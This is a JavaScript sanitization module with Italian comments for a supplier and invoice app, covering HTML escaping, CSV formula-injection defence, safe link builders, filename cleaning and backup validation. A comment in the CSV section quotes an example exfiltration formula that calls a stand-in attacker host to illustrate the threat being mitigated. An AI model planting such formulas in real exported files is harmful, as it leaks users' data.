// ╔═══════════════════════════════════════════════════════════════════════════╗
// ║  src/lib/sanitize.js                                                       ║
// ║  Helper di sanitization centralizzati per contesti HTML, URL, CSV e        ║
// ║  schema-validation di payload utente (backup import).                      ║
// ║                                                                            ║
// ║  Riferimenti:                                                              ║
// ║    - OWASP XSS Prevention Cheat Sheet                                      ║
// ║    - CWE-79 (XSS), CWE-1236 (Formula injection / CSV), CWE-601 (Open Redir)║
// ║                                                                            ║
// ║  Nessuna dipendenza esterna. Tutte le funzioni sono pure.                  ║
// ║                                                                            ║
// ║  Esistono helper analoghi in src/utils/safety.js (escapeHtml, isValidE164, ║
// ║  sniffMime, processAttachments). Quel modulo resta autoritativo per gli    ║
// ║  allegati DDT/fatture; questo modulo aggiunge i casi mancanti:             ║
// ║    - sanitizeCsvCell + buildCsv (CWE-1236)                                 ║
// ║    - escapeHtmlAttr (alias compatibile)                                    ║
// ║    - safeWhatsAppUrl / safeMailto / safeTel (URL allow-list)               ║
// ║    - safeFilename (no path traversal client-side)                          ║
// ║    - validateBackupShape (JSON schema check minimale)                      ║
// ║    - safeReceiptPrintHtml (template HTML stampabile auto-escapato)         ║
// ╚═══════════════════════════════════════════════════════════════════════════╝

// ── 1. HTML escaping (contesto testo dentro tag) ────────────────────────────
/**
 * Sanitizza una stringa per inserimento sicuro in contesto HTML text/attr.
 * Escapa: & < > " ' /
 * Identica per signature a src/utils/safety.js#escapeHtml (re-implementata
 * qui per evitare dipendenze tra utils/ e lib/).
 *
 * @param {unknown} s
 * @returns {string}
 */
export const escapeHtml = (s) => {
  if (s == null) return "";
  return String(s).replace(/[&<>"'/]/g, (c) => ({
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
    "/": "&#x2F;",
  }[c]));
};

/** Alias semantico — stesso encoding va bene per attributi quotati. */
export const escapeHtmlAttr = escapeHtml;

// ── 2. CSV cell sanitization (CWE-1236 — Formula injection) ────────────────
// Una cella che inizia con = + - @ \t \r viene interpretata come FORMULA
// da Excel/LibreOffice quando l'utente apre il file. Un fornitore malevolo
// che inserisce `=HYPERLINK("http://attacker.tld/?d="&A1,"Click")` nel proprio
// nome può esfiltrare la riga al primo doppio-click sul CSV esportato.
//
// Mitigazione: prefisso con apice singolo per disinnescare il parser formule,
// e quoting RFC 4180 per delimitatori/newline.
/**
 * @param {unknown} v
 * @returns {string}
 */
export const sanitizeCsvCell = (v) => {
  const s = v == null ? "" : String(v);
  if (s.length === 0) return s;
  let out = s;
  // Disinnesca formule
  if (/^[=+\-@\t\r]/.test(out)) {
    out = "'" + out;
  }
  // Quoting RFC 4180: se contiene , ; " \n \r → wrap in "..." con escape ""
  if (/[,;"\n\r]/.test(out)) {
    out = `"${out.replace(/"/g, '""')}"`;
  }
  return out;
};

/**
 * Costruisce un CSV completo (incluso BOM UTF-8) da una matrice di righe.
 * Usa sanitizeCsvCell su ogni cella.
 *
 * @param {ReadonlyArray<ReadonlyArray<unknown>>} rows
 * @param {{ delimiter?: string, bom?: boolean }} [opts]
 * @returns {string}
 */
export const buildCsv = (rows, opts = {}) => {
  const { delimiter = ",", bom = true } = opts;
  const body = rows
    .map((r) => r.map(sanitizeCsvCell).join(delimiter))
    .join("\r\n");
  return (bom ? "﻿" : "") + body;
};

// ── 3. URL allow-list per link esterni (WhatsApp / mail / tel) ─────────────
// Un nome rappresentante con caratteri esotici inserito in un href è XSS solo
// se non-encoded; qui validiamo il formato del numero e del testo libero in
// modo che l'URL risultante sia sempre well-formed e non ospiti payload.

/**
 * Valida + sanifica un numero telefonico per uso in wa.me / tel:.
 * Tiene solo + e cifre, rifiuta se vuoto o non passa il check E.164 minimo.
 *
 * @param {unknown} raw
 * @returns {string|null} numero pulito (senza spazi) o null se non valido
 */
export const sanitizePhoneForUrl = (raw) => {
  if (raw == null) return null;
  const cleaned = String(raw).replace(/[^+\d]/g, "");
  // E.164 (RFC) prevede + e 8–15 cifre. Accettiamo anche senza + (formati locali).
  if (!/^\+?[1-9]\d{7,14}$/.test(cleaned)) return null;
  return cleaned;
};

/**
 * Costruisce un URL wa.me sicuro. Se il numero è invalido ritorna null.
 *
 * @param {unknown} phone
 * @param {unknown} [text]
 * @returns {string|null}
 */
export const safeWhatsAppUrl = (phone, text) => {
  const num = sanitizePhoneForUrl(phone);
  if (!num) return null;
  const numNoPlus = num.startsWith("+") ? num.slice(1) : num;
  const t = text == null ? "" : String(text);
  // wa.me richiede il numero senza + e con encodeURIComponent sul testo
  return `https://wa.me/${numNoPlus}${t ? `?text=${encodeURIComponent(t)}` : ""}`;
};

/**
 * Costruisce un URL mailto: sicuro. Validazione email minimale.
 * Body può contenere newline → encodeURIComponent.
 *
 * @param {unknown} email
 * @param {{ subject?: string, body?: string }} [opts]
 * @returns {string|null}
 */
export const safeMailto = (email, opts = {}) => {
  if (email == null) return null;
  const e = String(email).trim();
  if (!/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(e)) return null;
  const params = [];
  if (opts.subject) params.push(`subject=${encodeURIComponent(opts.subject)}`);
  if (opts.body) params.push(`body=${encodeURIComponent(opts.body)}`);
  return `mailto:${encodeURIComponent(e).replace(/%40/g, "@")}${params.length ? `?${params.join("&")}` : ""}`;
};

/**
 * Costruisce un URL tel: sicuro.
 *
 * @param {unknown} phone
 * @returns {string|null}
 */
export const safeTel = (phone) => {
  const num = sanitizePhoneForUrl(phone);
  if (!num) return null;
  return `tel:${num}`;
};

// ── 4. Filename safe per download lato client ───────────────────────────────
// Anche se il path traversal non ha impatto su un download client-side
// (il browser comunque chiede dove salvare), nomi con / \ : ? ecc. su Windows
// causano errori di salvataggio o sostituzioni silenti.

/**
 * Sanifica un nome file:
 *   - rimuove caratteri vietati su Windows/macOS/Linux
 *   - rimuove sequenze di path-traversal
 *   - collassa whitespace
 *   - cap a 120 chars
 *
 * @param {unknown} name
 * @param {string} [fallback]
 * @returns {string}
 */
export const safeFilename = (name, fallback = "file") => {
  if (name == null) return fallback;
  let s = String(name);
  // Rimuovi separatori path e caratteri proibiti
  s = s.replace(/[\\/:*?"<>|\x00-\x1f]/g, "");
  // Rimuovi .. e leading dot
  s = s.replace(/\.{2,}/g, ".").replace(/^\.+/, "");
  // Collassa whitespace
  s = s.replace(/\s+/g, " ").trim();
  // Cap lunghezza (mantieni estensione se presente)
  if (s.length > 120) {
    const dot = s.lastIndexOf(".");
    if (dot > 100) {
      const ext = s.slice(dot);
      s = s.slice(0, 120 - ext.length) + ext;
    } else {
      s = s.slice(0, 120);
    }
  }
  return s || fallback;
};

// ── 5. Schema validators per backup JSON ────────────────────────────────────
// Niente zod / ajv — bastano ~30 righe pure per il subset che ci serve.
// Pattern: ogni validator ritorna boolean; isShape compone.

const _isString = (v) => typeof v === "string";
const _isNumber = (v) => typeof v === "number" && Number.isFinite(v);
const _isBool = (v) => typeof v === "boolean";
const _isArray = (v) => Array.isArray(v);
const _isObject = (v) => v != null && typeof v === "object" && !Array.isArray(v);

export const validators = {
  isString: _isString,
  isNumber: _isNumber,
  isBool: _isBool,
  isArray: _isArray,
  isObject: _isObject,
  isArrayOf: (itemCheck) => (v) => _isArray(v) && v.every(itemCheck),
  isShape: (shape) => (v) =>
    _isObject(v) && Object.entries(shape).every(([k, check]) => check(v[k])),
  optional: (check) => (v) => v === undefined || v === null || check(v),
};

/**
 * Valida lo schema di un backup JSON esportato da BackupDati.exportJson.
 * Forma attesa: { exportedAt: string?, appVersion: string?, state: {...} }
 * dentro state, gli array dei domini principali devono esistere.
 *
 * Ritorna { ok: true } oppure { ok: false, error: "msg in italiano per Andi" }
 *
 * @param {unknown} data
 * @returns {{ ok: true } | { ok: false, error: string }}
 */
export const validateBackupShape = (data) => {
  if (!_isObject(data)) {
    return { ok: false, error: "Il file non sembra un backup valido (root non è un oggetto JSON)." };
  }
  if (!_isObject(data.state)) {
    return { ok: false, error: "Il file non contiene il campo 'state': verifica di aver scelto il file giusto." };
  }
  const required = [
    "suppliers",
    "baseProducts",
    "dishesReal",
    "lots",
    "invoices",
    "purchaseOrders",
  ];
  for (const k of required) {
    if (!_isArray(data.state[k])) {
      return { ok: false, error: `Il backup è incompleto: manca o è malformato il campo '${k}'.` };
    }
  }
  // haccpLogs se presente deve essere un oggetto con i 3 array attesi
  if (data.state.haccpLogs !== undefined) {
    if (!_isObject(data.state.haccpLogs)) {
      return { ok: false, error: "Il campo 'haccpLogs' nel backup è malformato (atteso oggetto)." };
    }
    for (const k of ["temperature", "cleaning", "nonConformities"]) {
      if (data.state.haccpLogs[k] !== undefined && !_isArray(data.state.haccpLogs[k])) {
        return { ok: false, error: `Il campo 'haccpLogs.${k}' nel backup è malformato (atteso array).` };
      }
    }
  }
  return { ok: true };
};

// ── 6. Template HTML stampabile auto-escapato ───────────────────────────────
// Helper specifico per i pattern document.write(`...${userField}...`) che
// generano scontrini / etichette in popup. Usalo come tag template:
//   const html = safeHtml`<div>${userName}</div>`
// e ogni interpolazione viene auto-escapata via escapeHtml.
// Se devi includere HTML già fidato (es. block costruiti dal codice), usa
// safeHtmlRaw() come marker:
//   const items = safeHtmlRaw(rows.map(r => safeHtml`<li>${r.name}</li>`).join(""))

const SAFE_HTML_MARK = Symbol("safeHtml");

/**
 * Marca una stringa come HTML già fidato (non escapare ulteriormente).
 *
 * @param {string} raw
 */
export const safeHtmlRaw = (raw) => ({ [SAFE_HTML_MARK]: true, value: String(raw) });

/**
 * Tag template che escapa automaticamente ogni interpolazione.
 * Le stringhe statiche del template sono considerate sicure (le scrive lo dev).
 *
 * Esempio:
 *   const html = safeHtml`<title>Scontrino ${receipt.number}</title>`;
 *   w.document.write(html);
 *
 * @param {TemplateStringsArray} strings
 * @param  {...unknown} values
 * @returns {string}
 */
export const safeHtml = (strings, ...values) => {
  let out = strings[0];
  for (let i = 0; i < values.length; i++) {
    const v = values[i];
    if (v != null && typeof v === "object" && v[SAFE_HTML_MARK]) {
      out += v.value;
    } else {
      out += escapeHtml(v);
    }
    out += strings[i + 1];
  }
  return out;
};

// ── 7. Cap dimensione import JSON ───────────────────────────────────────────
// Con lo storico scontrini completo un backup reale supera i 60 MB: il cap
// deve restare sopra qualsiasi export prodotto dall'app stessa, altrimenti
// i backup non sono ripristinabili. 200 MB = solo sanity check anti-dump.
export const MAX_BACKUP_SIZE_BYTES = 200 * 1024 * 1024;

/**
 * @param {File} file
 * @returns {{ ok: true } | { ok: false, error: string }}
 */
export const validateBackupFile = (file) => {
  if (!file) return { ok: false, error: "Nessun file selezionato." };
  if (file.size > MAX_BACKUP_SIZE_BYTES) {
    return { ok: false, error: `File troppo grande (${(file.size / 1024 / 1024).toFixed(1)} MB, max ${MAX_BACKUP_SIZE_BYTES / 1024 / 1024} MB). Sei sicuro che sia un file di backup dell'app?` };
  }
  // Accept liberale: .json oppure application/json oppure text/plain
  const name = (file.name || "").toLowerCase();
  if (!name.endsWith(".json")) {
    return { ok: false, error: "Il file deve avere estensione .json." };
  }
  return { ok: true };
};
